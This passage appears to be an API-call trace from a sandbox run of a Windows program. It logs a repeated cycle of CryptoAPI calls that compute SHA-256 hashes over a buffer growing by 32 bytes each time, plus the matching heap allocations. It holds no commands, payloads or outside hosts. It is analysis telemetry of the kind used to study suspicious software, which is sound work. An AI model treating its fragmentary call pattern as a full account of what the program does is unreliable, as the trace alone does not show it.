	[0118.486] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.486] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0118.486] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.486] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb1b8
	[0118.486] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb1b8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb1b8, pdwDataLen=0x129364) returned 1
	[0118.486] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.486] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.486] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.487] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.487] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0118.487] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.487] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb1e0
	[0118.487] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb1e0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb1e0, pdwDataLen=0x129364) returned 1
	[0118.487] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.487] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.487] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.488] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.488] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0118.488] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.488] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb208
	[0118.488] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb208, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb208, pdwDataLen=0x129364) returned 1
	[0118.488] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.488] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.488] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.488] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.488] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0118.488] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.488] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb230
	[0118.488] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb230, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb230, pdwDataLen=0x129364) returned 1
	[0118.488] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.488] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.489] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.489] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.489] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0118.489] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.489] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb258
	[0118.489] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb258, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb258, pdwDataLen=0x129364) returned 1
	[0118.489] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.489] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.489] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.490] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.490] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0118.490] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.490] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb280
	[0118.490] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb280, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb280, pdwDataLen=0x129364) returned 1
	[0118.490] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.490] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.490] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.490] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.490] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0118.490] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.490] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb2a8
	[0118.490] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb2a8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb2a8, pdwDataLen=0x129364) returned 1
	[0118.490] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.490] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.490] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.491] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.491] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0118.491] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.491] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb2d0
	[0118.491] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb2d0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb2d0, pdwDataLen=0x129364) returned 1
	[0118.491] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.491] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.491] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.491] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.491] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0118.491] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.491] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb2f8
	[0118.491] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb2f8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb2f8, pdwDataLen=0x129364) returned 1
	[0118.491] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.491] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.491] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.492] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.492] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0118.492] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.492] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb320
	[0118.492] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb320, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb320, pdwDataLen=0x129364) returned 1
	[0118.492] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.492] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.492] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.492] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.492] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0118.492] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.492] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb348
	[0118.492] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb348, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb348, pdwDataLen=0x129364) returned 1
	[0118.492] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.492] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.492] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.493] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.493] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0118.493] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.493] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb370
	[0118.493] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb370, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb370, pdwDataLen=0x129364) returned 1
	[0118.493] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.493] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.493] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.493] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.493] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0118.493] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.493] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb398
	[0118.493] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb398, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb398, pdwDataLen=0x129364) returned 1
	[0118.493] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.493] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.493] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.494] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.494] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0118.494] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.494] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb3c0
	[0118.494] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb3c0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb3c0, pdwDataLen=0x129364) returned 1
	[0118.494] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.494] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.494] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.494] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.494] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0118.494] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.494] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb3e8
	[0118.494] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb3e8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb3e8, pdwDataLen=0x129364) returned 1
	[0118.494] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.494] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.494] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.495] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.495] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0118.495] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.495] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb410
	[0118.495] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb410, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb410, pdwDataLen=0x129364) returned 1
	[0118.495] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.495] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.495] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.495] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.495] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0118.495] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.495] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb438
	[0118.495] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb438, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb438, pdwDataLen=0x129364) returned 1
	[0118.495] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.495] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.495] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.496] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.496] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0118.496] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.496] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb460
	[0118.496] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb460, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb460, pdwDataLen=0x129364) returned 1
	[0118.496] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.496] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.496] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.496] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.496] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0118.496] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.496] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb488
	[0118.496] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb488, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb488, pdwDataLen=0x129364) returned 1
	[0118.496] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.496] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.496] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.497] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.497] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0118.497] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.497] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb4b0
	[0118.497] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb4b0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb4b0, pdwDataLen=0x129364) returned 1
	[0118.497] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.497] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.497] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.497] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.497] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0118.497] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.497] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb4d8
	[0118.497] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb4d8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb4d8, pdwDataLen=0x129364) returned 1
	[0118.497] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.498] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.498] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.498] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.498] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0118.498] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.498] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb500
	[0118.498] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb500, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb500, pdwDataLen=0x129364) returned 1
	[0118.498] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.498] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.498] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.499] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.499] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0118.499] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.499] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb528
	[0118.499] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb528, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb528, pdwDataLen=0x129364) returned 1
	[0118.499] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.499] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.499] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.499] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.499] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0118.499] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.499] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb550
	[0118.499] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb550, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb550, pdwDataLen=0x129364) returned 1
	[0118.499] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.499] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.499] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.500] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.500] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0118.500] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.500] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb578
	[0118.500] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb578, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb578, pdwDataLen=0x129364) returned 1
	[0118.500] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.500] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.500] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.500] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.500] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0118.500] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.500] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb5a0
	[0118.500] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb5a0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb5a0, pdwDataLen=0x129364) returned 1
	[0118.500] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.500] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
